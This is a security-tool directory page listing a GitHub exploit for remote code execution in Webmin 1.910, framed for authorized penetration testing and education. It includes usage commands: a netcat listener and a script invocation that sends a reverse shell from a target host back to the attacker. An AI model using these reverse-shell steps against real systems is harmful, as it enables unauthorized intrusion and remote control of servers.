Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Webmin1.910_exploit — Webmin 1.910 Remote Code Execution Exploit | Kitploit
Tools/GitHubGitHub/h3x0v3rl0rd/webmin1.910_exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubh3x0v3rl0rd/webmin1.910_exploit

Webmin1.910_exploit

Webmin 1.910 Remote Code Execution Exploit

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Webmin 1.910 Remote Code Execution Exploit

Description:

This repository contains a Python 3 script designed to exploit a remote code execution vulnerability in Webmin version 1.910. The script utilizes the session_login.cgi endpoint to perform authentication and deploy a reverse shell payload, granting remote access to the target system. This exploit is intended for authorized penetration testing and educational purposes.


  1. Start a listener on your local machine:
root@kitploit:~
nc -lvnp <lport>
  1. Run the script using the following command:
root@kitploit:~
python3 webmin_exploit.py --rhost <target_ip> --lhost <your_ip> --lport <your_port> -u <username> -p <password>

image

image

Download Tool